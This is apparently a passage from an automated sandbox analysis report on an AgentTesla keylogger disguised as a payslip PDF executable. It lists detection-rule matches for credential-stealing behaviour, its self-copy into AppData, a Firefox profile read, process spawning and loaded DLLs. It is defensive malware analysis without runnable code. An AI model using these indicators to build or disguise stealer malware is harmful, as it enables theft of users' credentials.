                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013CE8E88_2_013CE8E8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013C4A688_2_013C4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013C3E508_2_013C3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013C41988_2_013C4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013CAC808_2_013CAC80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB7E988_2_06DB7E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB56B08_2_06DB56B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB67088_2_06DB6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB35808_2_06DB3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB5E108_2_06DB5E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB77B88_2_06DB77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB00408_2_06DB0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06DB00078_2_06DB0007
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033211026.0000000002BD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2045308094.00000000077C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2032307215.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000000.2022449219.0000000000582000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeopJ.exe. vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4490410074.00000000009E9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exeBinary or memory string: OriginalFilenameeopJ.exe. vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Payslip_October_2024_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, HhRnp80YNIZjcH3iKc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, HhRnp80YNIZjcH3iKc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, HhRnp80YNIZjcH3iKc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@2/2
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024_pdf.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: Payslip_October_2024_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Payslip_October_2024_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000000.2022449219.0000000000582000.00000002.00000001.01000000.00000003.sdmp, sgxIb.exe.3.drBinary or memory string: SELECT mv.code, mv.title, mv.image, gr.description AS genre, mv.year, mv.seconds, mv.membership_types_id AS id, mv.description, mv.code AS code2 FROM movies_record mr INNER JOIN movies mv ON (mv.code = mr.movie_code) INNER JOIN genres gr ON (mv.genre_id = gr.id) ;WHERE mr.membership_id = {0}
                    Source: Payslip_October_2024_pdf.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile read: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
